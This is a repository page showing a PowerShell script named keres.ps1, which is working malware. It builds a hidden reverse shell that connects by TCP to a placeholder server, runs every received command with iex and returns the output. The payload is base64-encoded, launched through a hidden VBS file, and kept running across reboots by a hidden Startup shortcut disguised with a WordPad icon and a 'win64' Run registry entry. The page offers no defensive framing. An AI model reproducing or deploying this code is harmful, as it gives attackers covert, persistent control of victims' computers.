-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathkeres.ps1
133 lines (107 loc) · 4.82 KB
/
keres.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
param(
[string]$IconLocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe",
[string]$HotKey = "CTRL+W",
[string]$Description = "powershell",
[int]$WindowStyle = 7,
[switch]$Hidden = $true,
[switch]$p=$true,
[string]$ScriptArgument = ""
)
$homePath = [Environment]::GetFolderPath("UserProfile")
$hiddenVbsPath = Join-Path -Path $homePath -ChildPath "script.vbs"
$psScript = @'
$uniqueIdentifier = "Keres"
$maxProcesses = 1
$spawnedProcesses = 0
while ($true){
$isRunning = Get-Process -Name powershell -ErrorAction SilentlyContinue | Where-Object { $_.CommandLine -like "*$uniqueIdentifier*" }
if (-not $isRunning -and $spawnedProcesses -lt $maxProcesses) {
$connectionTest = Test-Connection -ComputerName 'server_address' -Count 1 -Quiet
if ($connectionTest) {
Start-Process $PSHOME\powershell.exe -ArgumentList {
$uniqueIdentifier
$client = New-Object System.Net.Sockets.TcpClient
try {
$client.Connect('server_address', port_number)
$stream = $client.GetStream()
while ($true) {
if (-not $client.Connected) {
Write-Host "Connection lost. Reconnecting..."
Start-Sleep -Seconds 60 # Wait for 60 seconds before attempting to reconnect
break
}
$bytes = New-Object byte[] 65535
$i = $stream.Read($bytes, 0, $bytes.Length)
if ($i -le 0) {
Write-Host "Connection to server closed. Reconnecting..."
Start-Sleep -Seconds 60 # Wait for 60 seconds before attempting to reconnect
break
}
$data = [System.Text.Encoding]::ASCII.GetString($bytes, 0, $i)
$sendback = (iex $data 2>&1 | Out-String)
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2)
$stream.Write($sendbyte, 0, $sendbyte.Length)
$stream.Flush()
}
} catch {
Write-Host "Error: $_"
} finally {
if ($stream) { $stream.Close() }
if ($client) { $client.Close() }
}
} -WindowStyle Hidden
$spawnedProcesses++
} else {
Write-Host "No connection to the server. Skipping process spawn."
}
} elseif ($spawnedProcesses -ge $maxProcesses) {
Write-Host "Maximum number of processes reached. Skipping process spawn."
} else {
Write-Host "Script is already running."
}
# Count processes after a 60-second wait
Start-Sleep -Seconds 60
$spawnedProcesses = (Get-Process -Name powershell -ErrorAction SilentlyContinue | Where-Object { $_.CommandLine -like "*$uniqueIdentifier*" }).Count
}
'@
$bytes = [System.Text.Encoding]::Unicode.GetBytes($psScript)
$encodedPsScript = [Convert]::ToBase64String($bytes)
# Define the VBS script
$vbsScript = @"
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -EncodedCommand $encodedPsScript", 0, False
"@
# Write the VBS script to a file
Set-Content -Path $hiddenVbsPath -Value $vbsScript
# Set the hidden attribute
Set-ItemProperty -Path $hiddenVbsPath -Name Attributes -Value 'Hidden'
if ($p) {
#Define the path for the shortcut in the Startup folder
$shortcutPath = "$([Environment]::GetFolderPath('Startup'))\win64.lnk"
$registryPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
Set-ItemProperty -Path $registryPath -Name win64 -Value $shortcutPath
# Create a WScript Shell object
$wshell = New-Object -ComObject Wscript.Shell
# Create or modify the shortcut object
$shortcut = $wshell.CreateShortcut($shortcutPath)
# Set the icon location for the shortcut
$shortcut.IconLocation = $IconLocation
# Set the target path and arguments for the shortcut
$shortcut.TargetPath = "powershell.exe"
$shortcut.Arguments = "-WindowStyle Hidden -NoProfile $hiddenVbsPath "
# Set the working directory for the shortcut
$shortcut.WorkingDirectory = (Get-Item $hiddenVbsPath ).DirectoryName
# Set a hotkey for the shortcut
$shortcut.HotKey = $HotKey
# Set a description for the shortcut
$shortcut.Description = $Description
# Set the window style for the shortcut
$shortcut.WindowStyle = $WindowStyle
# Save the shortcut
$shortcut.Save()
# Optionally set the 'Hidden' attribute
if ($Hidden) {
[System.IO.File]::SetAttributes($shortcutPath, [System.IO.FileAttributes]::Hidden)
}
}